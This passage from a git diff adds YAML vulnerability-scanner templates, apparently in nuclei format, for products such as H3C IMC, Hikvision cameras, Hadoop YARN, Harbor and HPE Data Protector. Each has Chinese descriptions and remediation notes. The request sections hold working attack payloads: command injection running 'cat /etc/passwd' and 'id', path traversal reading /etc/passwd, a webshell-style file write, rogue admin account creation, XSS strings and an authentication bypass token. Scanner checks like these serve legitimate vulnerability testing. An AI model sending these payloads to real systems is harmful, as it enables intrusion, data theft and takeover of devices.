4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - PHP Extension + - PHP Version + extractors: + - type: regex + regex: + -

PHP Version ([0-9.]+)<\/h1> + group: 1 + part: body + matchers-condition: and + path: + - '{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();' + method: GET diff --git "a/config/51pwn/yaml/H3C SecPath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/unauthorized-h3csecparh-login.yaml" "b/config/51pwn/yaml/H3C SecPath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/unauthorized-h3csecparh-login.yaml" new file mode 100755 index 000000000..0d7c059f9 --- /dev/null +++ "b/config/51pwn/yaml/H3C SecPath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/unauthorized-h3csecparh-login.yaml" @@ -0,0 +1,38 @@ +id: unauthorized-h3csecparh-login +info: + name: Unauthorized H3C Secparh Login + author: + - l0ne1y + description: |- + H3C SecPath 运维审计系统未授权登陆 + 新华三技术有限公司是一家新IT解决方案提供商,致力于成为客户业务创新、数字化转型最可信赖的合作伙伴。主营产品有路由器,大数据,交换机,物联网,云计算,服务器等。 H3C SecPath运维审计系统存在未授权访问漏洞,攻击者可利用该漏洞获取敏感信息 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.h3c.com/cn/d_202104/1402680_30005_40.htm#_Toc69840633 + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - admin + - 审计管理员 + - 错误的id + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin' + method: GET diff --git "a/config/51pwn/yaml/H3C\346\231\272\350\203\275\347\256\241\347\220\206\344\270\255\345\277\203(IMC)/h3c-imc-rce.yaml" "b/config/51pwn/yaml/H3C\346\231\272\350\203\275\347\256\241\347\220\206\344\270\255\345\277\203(IMC)/h3c-imc-rce.yaml" new file mode 100755 index 000000000..eb5bf159d --- /dev/null +++ "b/config/51pwn/yaml/H3C\346\231\272\350\203\275\347\256\241\347\220\206\344\270\255\345\277\203(IMC)/h3c-imc-rce.yaml" @@ -0,0 +1,44 @@ +id: h3c-imc-rce +info: + name: H3c IMC RCE + author: + - l0ne1y + description: |- + H3c IMC 命令执行漏洞 + H3C智能管理中心(intelligence Management Center,iMC)平台(以下简称iMC平台)dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.h3c.com/cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - \[(font|extension|file)s\] + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}} + payloads: + command: + - cat /etc/passwd + - type C:\\Windows\\win.ini + stop-at-first-match: true diff --git a/config/51pwn/yaml/HBase/apache-hbase-unauth.yaml b/config/51pwn/yaml/HBase/apache-hbase-unauth.yaml new file mode 100755 index 000000000..d4efc8839 --- /dev/null +++ b/config/51pwn/yaml/HBase/apache-hbase-unauth.yaml @@ -0,0 +1,37 @@ +id: apache-hbase-unauth +info: + name: Apache Hbase Unauth + author: + - l0ne1y + description: |- + Apache Hbase 监控页面未授权访问漏洞 + Apache HBase是基于Hadoop构建的一个分布式的、可伸缩的海量数据存储系统,其底层用HDFS实现数据存储。其web管理页面存在未授权即登录的情况。 + severity: medium + remediation: |- + 1.上传jar包hbase-http-auth-e3base.jar到hbase集群主机上的H B A S E H O M E / l i b / 目 录 下 并 分 发 到 集 群 其 它 主 机 。 + 2.修改配置文件HBASE_HOME/conf/hbase-site.xml增加 + + + hbase.http.sitech.staticuser.user + e3base:Abcd1234 + + + hbase.http.filter.initializers + org.apache.hadoop.hbase.http.lib.StaticUserWebFilter,org.apache.hadoop.hbase.http.lib.SitechStaticUserWebFilter + + 注:由于用户名和密码是用冒号作为分割,所以设置的用户名中不能有冒号,设置的密码中也不能包含有冒号,否则无法识别。且登陆的用户,只能设置一个 + 3.分发配置文件 + 4.重启hbase +requests: +- matchers: + - type: word + words: + - hbase.defaults.for.version + - hbase-default.xml + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/conf' + method: GET diff --git "a/config/51pwn/yaml/HIM\345\237\272\347\241\200\345\271\263\345\217\260\347\256\241\347\220\206\347\263\273\347\273\237/hjtcloud-arbitrary-file-read.yaml" "b/config/51pwn/yaml/HIM\345\237\272\347\241\200\345\271\263\345\217\260\347\256\241\347\220\206\347\263\273\347\273\237/hjtcloud-arbitrary-file-read.yaml" new file mode 100755 index 000000000..d30c2989a --- /dev/null +++ "b/config/51pwn/yaml/HIM\345\237\272\347\241\200\345\271\263\345\217\260\347\256\241\347\220\206\347\263\273\347\273\237/hjtcloud-arbitrary-file-read.yaml" @@ -0,0 +1,48 @@ +id: hjtcloud-arbitrary-file-read +info: + name: HJTcloud Arbitrary File Read + author: + - l0ne1y + description: |- + 中创视讯HIM基础平台管理系统文件读取 + 北京中创视讯科技有限公司是一家专注于视频会议系统软硬件研发的高科技公司。 + + 北京中创视讯科技有限公司HIM基础平台管理系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.hjtcloud.com + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + condition: or + regex: + - 'root:.*:0:0:' + - bit app support + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /fileDownload?action=downloadBackupFile HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + fullPath=/etc/passwd + - | + POST /fileDownload?action=downloadBackupFile HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + fullPath=/Windows/win.ini diff --git a/config/51pwn/yaml/HPE Data Protector/CVE-2016-2004.yaml b/config/51pwn/yaml/HPE Data Protector/CVE-2016-2004.yaml new file mode 100755 index 000000000..29931ae3d --- /dev/null +++ b/config/51pwn/yaml/HPE Data Protector/CVE-2016-2004.yaml @@ -0,0 +1,23 @@ +id: CVE-2016-2004 +info: + name: HP Data Protector - Arbitrary Command Execution + author: + - l0ne1y + description: "HPE Data Protector 代码执行漏洞\n HPE Data Protector是美国惠普企业(Hewlett Packard + Enterprise,HPE)公司的一套统一数据保护解决方案。该方案通过利用智能数据管理方法,保护跨所有物理和虚拟环境的数据,提供三方(应用源、备用服务器和目标设备)重复数据删除功能。\n\nHPE + Data Protector中存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:HPE Data Protector 7.03_108之前版本,8.15之前版本,9.06之前版本。 " + severity: critical + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁\n 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\n\nhttp://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988 + \n\n临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\\\’”,双引号“””会被转义为“\\\\””,分号“;”会被转义为“\\\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。" +network: +- matchers: + - type: word + words: + - 00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000 + encoding: hex + host: + - '{{Hostname}}' + - '{{Host}}:5555' + inputs: + - data: 00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900 + type: hex diff --git a/config/51pwn/yaml/HPE System Management Homepage/CVE-2017-12544.yaml b/config/51pwn/yaml/HPE System Management Homepage/CVE-2017-12544.yaml new file mode 100755 index 000000000..2cb5661ff --- /dev/null +++ b/config/51pwn/yaml/HPE System Management Homepage/CVE-2017-12544.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-12544 +info: + name: HPE System Management - XSS + author: + - l0ne1y + description: "HPE System Management Homepage Software 跨站脚本漏洞 \n HPE System Management + Homepage(SMH)Software是美国惠普企业(Hewlett Packard Enterprise,HPE)公司的一个基于Web的界面。该界面可整合和简化对运行HP-UX、Linux和Microsoft + Windows操作系统的HP服务器的单系统管理过程。\n\nHPE SMH Software 7.6.1之前的版本中存在跨站脚本漏洞。远程攻击者可利用该漏洞执行任意代码。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - var prodName = '';prompt`document.domain`;//'; + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/gsearch.php.en?prod='';prompt`document.domain`;//' + method: GET diff --git a/config/51pwn/yaml/Hadoop/hadoop-unauth.yaml b/config/51pwn/yaml/Hadoop/hadoop-unauth.yaml new file mode 100755 index 000000000..2a888a5d7 --- /dev/null +++ b/config/51pwn/yaml/Hadoop/hadoop-unauth.yaml @@ -0,0 +1,60 @@ +id: hadoop-unauth +info: + name: Apache Hadoop Unauth + author: + - l0ne1y + description: |- + Apache Hadoop监控页面未授权访问漏洞 + Apache Hadoop是一套用于在由通用硬件构建的大型集群上运行应用程序的框架。其监控页面存在未授权访问绕过的漏洞。 + severity: medium + remediation: |- + 1.上传附件的jar包hadoop-http-auth-e3base.jar到$HADOOP_HOME/share/hadoop/common目录下 + 并分发到另外两台主机 + + 2.修改$HADOOP_HOME/etc/hadoop/core-site.xml增加相关配置 + + + hadoop.http.filter.initializers + org.apache.hadoop.security.AuthenticationFilterInitializer + + + hadoop.http.authentication.type + org.apache.hadoop.security.authentication.server.SitechAuthenticationHandler + + + hadoop.http.authentication.token.validity + 3600 + + + hadoop.http.authentication.sitech.staticuser.user + e3base:Abcd1234 + + + hadoop.http.authentication.cookie.domain + + + + hadoop.http.authentication.simple.anonymous.allowed + false + + 其中 + hadoop.http.authentication.sitech.staticuser.user的值为 :<用户名>:<密码> + 注:由于用户名和密码是用冒号作为分割,所以设置的用户名中不能有冒号,设置的密码中也不能包含有冒号,否则无法识别。且登陆的用户,只能设置一个 + + 3.将core-site.xml分发到hadoop集群的其他主机上 + 4.重启hadoop +requests: +- matchers: + - type: word + condition: and + words: + - hadoopVersion + - resourceManagerVersionBuiltOn + - type: word + words: + - javax.ws.rs.WebApplicationException + matchers-condition: or + path: + - '{{BaseURL}}/ws/v1/cluster/info' + - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + method: GET diff --git a/config/51pwn/yaml/Hadoop/yarn-resourcemanager-rce.yaml b/config/51pwn/yaml/Hadoop/yarn-resourcemanager-rce.yaml new file mode 100755 index 000000000..1e14d7cb7 --- /dev/null +++ b/config/51pwn/yaml/Hadoop/yarn-resourcemanager-rce.yaml @@ -0,0 +1,33 @@ +id: yarn-resourcemanager-rce +info: + name: Apache Yarn ResourceManager RCE + author: + - l0ne1y + description: |- + Hadoop YARN 未授权 RCE + Hadoop 是由 Apache 基金会开发的分布式系统基础架构。YARN 是 hadoop 系统上的统一资源管理平台。它的主要作用是实现集群资源的统一管理和调度。MapReduce 计算框架可以作为应用程序运行。在 YARN 系统之上,通过 YARN 管理资源。简单地说,用户可以将特定的应用程序提交给YARN执行,它允许执行相关的include系统命令。 + YARN提供REST API(默认为前者),在8088和8090默认开放,用户可以通过API直接进行相关的应用创建、任务提交等操作。如果配置不当,REST API 将在公共网络中打开并导致未经授权的访问 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://hadoop.apache.org/ + + 临时修复方案: + 1、通过iptables或安全组配置访问策略,限制对8088等端口的访问 + 2、如非必要,不要在公网打开接口,改为本地或内网调用。 + 3、升级Hadoop到2.x版本,开启Kerberos认证,防止匿名访问 +requests: +- matchers: + - type: word + condition: and + words: + - application-id + - maximum-resource-capability + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + method: POST diff --git a/config/51pwn/yaml/Harbor/CVE-2019-16097.yaml b/config/51pwn/yaml/Harbor/CVE-2019-16097.yaml new file mode 100755 index 000000000..4ed97e1e1 --- /dev/null +++ b/config/51pwn/yaml/Harbor/CVE-2019-16097.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-16097 +info: + name: Harbor <=1.82.0 - Privilege Escalation + author: + - l0ne1y + description: |- + Harbor 创建管理员漏洞 + Harbor是一款开源的可信云本机注册表。该产品主要用于存储、签名和扫描容器映像以查找漏洞。 + Harbor 1.7.0版本至1.8.2版本中的core/api/user.go文件存在权限许可和访问控制问题漏洞。攻击者可利用该漏洞创建admin账户。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517 + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + condition: or + part: response + words: + - username has already been used + - 'Location: /api/users/' + - type: status + condition: or + status: + - 201 + - 409 + matchers-condition: and + path: + - '{{BaseURL}}/api/users' + method: POST + body: | + {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} + headers: + Content-Type: application/json diff --git "a/config/51pwn/yaml/HiBOS\351\205\222\345\272\227\345\256\275\345\270\246\350\277\220\350\220\245\347\263\273\347\273\237/AmttHiboss-Server-Rce.yaml" "b/config/51pwn/yaml/HiBOS\351\205\222\345\272\227\345\256\275\345\270\246\350\277\220\350\220\245\347\263\273\347\273\237/AmttHiboss-Server-Rce.yaml" new file mode 100755 index 000000000..9bac8ba84 --- /dev/null +++ "b/config/51pwn/yaml/HiBOS\351\205\222\345\272\227\345\256\275\345\270\246\350\277\220\350\220\245\347\263\273\347\273\237/AmttHiboss-Server-Rce.yaml" @@ -0,0 +1,34 @@ +id: AmttHiboss-Server-Rce +info: + name: 安美数字-酒店宽带运营系统-远程命令执行漏洞 + author: + - l0ne1y + description: |- + 安美数字酒店宽带运营系统远程命令执行漏洞 + HIBOS酒店宽带运营系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限 + severity: critical + remediation: |- + 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。http://www.amttgroup.com/ + + 临时修复建议: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body_1,"parent.doTestResult") && status_code_1==200 + - 'status_code_2==200 && contains(body_2,verify) ' + matchers-condition: and + path: + - '{{BaseURL}}/manager/radius/server_ping.php?ip=127.0.0.1|echo%20"">../../{{fileName}}.php&id=1' + - '{{BaseURL}}/{{fileName}}.php' + method: GET + req-condition: true +variables: + fileName: '{{rand_text_alphanumeric(6,"")}}' + verify: '{{rand_int(200000000, 210000000)}}' diff --git a/config/51pwn/yaml/HighMail/CVE-2020-23517.yaml b/config/51pwn/yaml/HighMail/CVE-2020-23517.yaml new file mode 100755 index 000000000..63ce219f3 --- /dev/null +++ b/config/51pwn/yaml/HighMail/CVE-2020-23517.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-23517 +info: + name: Aryanic HighMail (High CMS) Cross-Site Scripting + author: + - geeknik + tags: + - xss + - cve + - cve2020 + description: |+ + Aryanic HighMail 跨站脚本漏洞 + Arianik Aryanic HighMail是伊朗Arianik公司的一个应用软件。用于发送和接收邮件。 + + Aryanic HighMail versions 2020 存在安全漏洞,该漏洞允许远程攻击者通过“用户”注入任意web脚本或HTML以登录inform。 + + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-23517 + - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html + severity: medium + classification: + cve-id: + - cve-2020-23517 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.aryanic.com/products-highcms.html + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: header + words: + - text/html + - type: word + words: + - ' + method: GET diff --git a/config/51pwn/yaml/Hikvision Cameras/CVE-2017-7921.yaml b/config/51pwn/yaml/Hikvision Cameras/CVE-2017-7921.yaml new file mode 100755 index 000000000..41cd872da --- /dev/null +++ b/config/51pwn/yaml/Hikvision Cameras/CVE-2017-7921.yaml @@ -0,0 +1,38 @@ +id: CVE-2017-7921 +info: + name: Hikvision - Authentication Bypass + author: + - l0ne1y + description: |- + Hikvision Cameras不正确身份验证漏洞 + Hikvision Cameras是海康公司生产的一款相机。 + + 多款Hikvision Cameras存在不正确身份验证漏洞。攻击者可以利用该漏洞获取敏感信息,绕过身份验证机制并危及用户帐户。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hikvision.com/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - application/xml + matchers-condition: and + path: + - '{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK' + method: GET diff --git a/config/51pwn/yaml/Hikvision Web Server/CVE-2021-36260.yaml b/config/51pwn/yaml/Hikvision Web Server/CVE-2021-36260.yaml new file mode 100755 index 000000000..34d2edfef --- /dev/null +++ b/config/51pwn/yaml/Hikvision Web Server/CVE-2021-36260.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-36260 +info: + name: Hikvision IP camera/NVR - Remote Command Execution + author: + - l0ne1y + description: |- + Hikvision Web Server 命令注入漏洞 + Hikvision Web Server是中国海康威视(Hikvision)公司的一个Web服务器。用于解析协议,提供服务。 + Hikvision Web Server 中存在命令注入漏洞,该漏洞源于输入验证不足。攻击者可利用该漏洞通过发送带有恶意命令的消息来发起命令注入攻击。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_2,'uid=') && contains(body_2,'gid=') + - status_code_1 == 500 && status_code_2 == 200 + extractors: + - type: regex + regex: + - (u|g)id=.* + raw: + - | + PUT /SDK/webLanguage HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + $(id>webLib/x) + - | + GET /x HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Hitachi Vantara Pentaho/CVE-2021-31602.yaml b/config/51pwn/yaml/Hitachi Vantara Pentaho/CVE-2021-31602.yaml new file mode 100755 index 000000000..395345bef --- /dev/null +++ b/config/51pwn/yaml/Hitachi Vantara Pentaho/CVE-2021-31602.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-31602 +info: + name: Pentaho <= 9.1 Authentication Bypass of Spring APIs + author: + - l0ne1y + description: |- + Pentaho Business Analytics 认证绕过漏洞 + Hitachi Vantara Pentaho是日本Hitachi公司的一款用于大数据环境中对数据进行存储和管理的服务。 + + Hitachi Vantara Pentaho 存在访问控制错误漏洞,该漏洞源于在 Hitachi Vantara Pentaho 通过 9.1 和 Pentaho Business Intelligence Server 通过 7.x 中发现了一个问题。安全模型具有不同的访问控制层。其中一层是 applicationContext 安全性,它在 applicationContext-spring-security.xml 文件中定义。默认配置允许先前不了解平台设置的未经身份验证的用户在不拥有有效凭据的情况下提取信息片段。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://support.pentaho.com/hc/en-us + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: 